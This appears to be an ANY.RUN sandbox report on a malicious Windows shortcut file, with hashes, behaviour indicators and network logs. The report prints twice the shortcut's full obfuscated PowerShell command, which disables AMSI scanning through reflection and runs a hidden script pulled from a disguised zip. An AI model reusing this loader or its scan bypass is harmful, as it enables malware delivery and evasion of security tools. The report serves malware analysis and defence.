File name:

lnk

Full analysis: https://app.any.run/tasks/a6df00af-8893-4b6f-856f-a2f825b4b5f8
Verdict: Malicious activity
Analysis date: April 17, 2026, 14:57:19
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-lnk
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=45, Unicoded, Archive, length=431104, window=showminnoactive, IDListSize 0x018d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe"
MD5:

15B14B9829F34521450E4E7D8D212052

SHA1:

F52840234797DFAEFD29E8C42CB3868CCC81EC96

SHA256:

BA929388AE8B854A9C98B37C4DAE2BDA4F15DD1CAD97388224C4F636D7D26C6C

SSDEEP:

96:8s0FL5rrSKC9CnAOcO7+1RNY5Evp/MCc8KtwxFssAwFlsaAyZAHcGgli:8s0FjC9CAOcO7wRNaEvp/MC/KtwzsTwi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • References archive utilities (LNK)

      • powershell.exe (PID: 2576)

  • SUSPICIOUS

    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 2576)

    • Escape characters obfuscation (POWERSHELL)

      • powershell.exe (PID: 2576)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, CommandArgs, IconFile, Unicode
FileAttributes: Archive
TargetFileSize: 431104
IconIndex: 45
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: Powershell.exe
DriveType: Fixed Disk
DriveSerialNumber: 0000-0000
VolumeLabel: -
LocalBasePath: C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe
CommandLineArguments: $ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;if(!$zRv){$uEblg='.','Downloads','Documents','Desktop'|.('foreach-object'){(.('gci') env:USERPROFILE).('Value')+$iL+$_ }|.('foreach-object'){try{[IO.Directory]::('getfiles')($_,$znwZu+'.zip',$uTgUz)}catch{}}|.('select-object') -f ($ci-1);};if(!$uEblg){return};$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontentf7f81a39-5f63-5b42-9efd-1f13b5431005#39;);$UKL=$ZbZSa::$sARqq('','iUt','ilsf7f81a39-5f63-5b42-9efd-1f13b5431005#39;);$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();foreach($fdqwn in $NKE) {if($fdqwn.$TWJT -match $UKL){$ZOXE=$fdqwn}};$rO=$ZOXE.('GetMethods')($G);foreach($AQ in $rO) {if($AQ.$TWJT -match $HsxN){$HjGz=$AQ}};class B { static [int] A([string]$SA){return $SA[0]}};$O=([type]('B')).('GetMethod')('A');$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR}|.('select-object') -f ($ci-1);if(!$f){return};$sARqq='join';$ZbZSa=[type]'string';$hrYI='split';$clyd=$TFhR.('length');$EvYn=$f.('substring')($clyd);$C=$EvYn.$hrYI('`');$UyKmX=$ZbZSa::$sARqq('',$C);$znwZu=(41-$ci);$znwZu=[char]($znwZu);$QbMKJ='$l='+$znwZu+$uEblg+$znwZu+';'+$UyKmX;$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;Write-Host '.';
IconFileName: %SystemRoot%\system32\SHELL32.dll
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
135
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2576"C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe" $ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;if(!$zRv){$uEblg='.','Downloads','Documents','Desktop'|.('foreach-object'){(.('gci') env:USERPROFILE).('Value')+$iL+$_ }|.('foreach-object'){try{[IO.Directory]::('getfiles')($_,$znwZu+'.zip',$uTgUz)}catch{}}|.('select-object') -f ($ci-1);};if(!$uEblg){return};$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontentf7f81a39-5f63-5b42-9efd-1f13b5431005#39;);$UKL=$ZbZSa::$sARqq('','iUt','ilsf7f81a39-5f63-5b42-9efd-1f13b5431005#39;);$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();foreach($fdqwn in $NKE) {if($fdqwn.$TWJT -match $UKL){$ZOXE=$fdqwn}};$rO=$ZOXE.('GetMethods')($G);foreach($AQ in $rO) {if($AQ.$TWJT -match $HsxN){$HjGz=$AQ}};class B { static [int] A([string]$SA){return $SA[0]}};$O=([type]('B')).('GetMethod')('A');$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR}|.('select-object') -f ($ci-1);if(!$f){return};$sARqq='join';$ZbZSa=[type]'string';$hrYI='split';$clyd=$TFhR.('length');$EvYn=$f.('substring')($clyd);$C=$EvYn.$hrYI('`');$UyKmX=$ZbZSa::$sARqq('',$C);$znwZu=(41-$ci);$znwZu=[char]($znwZu);$QbMKJ='$l='+$znwZu+$uEblg+$znwZu+';'+$UyKmX;$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;Write-Host '.';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
7780\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
7 649
Read events
7 649
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2576powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\abb0679f9841ca75.customDestinations-msbinary
MD5:EF8B26C424975BB9BCF8452DF7554E94
SHA256:7FC130139FCA7525E2F2837456133D79FB014F630848350FFBB67D03D8C2E981
2576powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P9CPAL3U9CEJLBW6EALN.tempbinary
MD5:EF8B26C424975BB9BCF8452DF7554E94
SHA256:7FC130139FCA7525E2F2837456133D79FB014F630848350FFBB67D03D8C2E981
2576powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gre1emab.4fh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2576powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yy1hym05.5yd.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2576powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:289DD891AC4D3F77CB48D9EF885F8477
SHA256:A78E49CC151BA5549FE3D15D39C863E9D00BAA4599037C5563CFDC2B87964197
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
35
TCP/UDP connections
24
DNS requests
19
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5276
MoUsoCoreWorker.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
whitelisted
2156
SIHClient.exe
GET
304
74.179.77.204:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
2156
SIHClient.exe
GET
200
135.233.95.135:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
whitelisted
2156
SIHClient.exe
GET
200
74.179.77.204:443
https://slscr.update.microsoft.com/sls/ping
US
whitelisted
2156
SIHClient.exe
GET
304
74.179.77.204:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
8044
svchost.exe
GET
200
23.216.77.22:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
5316
svchost.exe
POST
400
40.126.31.2:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
8044
svchost.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/UpdateHealthTools?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3626&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=SedimentPack&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2
US
whitelisted
5316
svchost.exe
POST
400
40.126.31.2:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
5316
svchost.exe
GET
200
23.11.40.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAz1vQYrVgL0erhQLCPM8GY%3D
NL
binary
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
8044
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5276
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
5316
svchost.exe
40.126.31.2:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5316
svchost.exe
23.11.40.157:80
ocsp.digicert.com
AKAMAI-AMS
NL
whitelisted
3428
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
8044
svchost.exe
23.216.77.22:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
8044
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
google.com
  • 142.250.154.138
  • 142.250.154.102
  • 142.250.154.101
  • 142.250.154.139
  • 142.250.154.100
  • 142.250.154.113
whitelisted
login.live.com
  • 40.126.31.2
  • 20.190.159.0
  • 20.190.159.68
  • 20.190.159.64
  • 40.126.31.69
  • 20.190.159.2
  • 40.126.31.1
  • 20.190.159.131
whitelisted
ocsp.digicert.com
  • 23.11.40.157
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
crl.microsoft.com
  • 23.216.77.22
  • 23.216.77.36
  • 23.216.77.28
  • 23.216.77.19
  • 23.216.77.8
  • 23.216.77.35
  • 23.216.77.38
  • 23.216.77.20
  • 23.216.77.37
  • 23.216.77.25
  • 23.216.77.41
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
slscr.update.microsoft.com
  • 74.179.77.204
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 135.233.95.135
whitelisted

Threats

PID
Process
Class
Message
8044
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
No debug info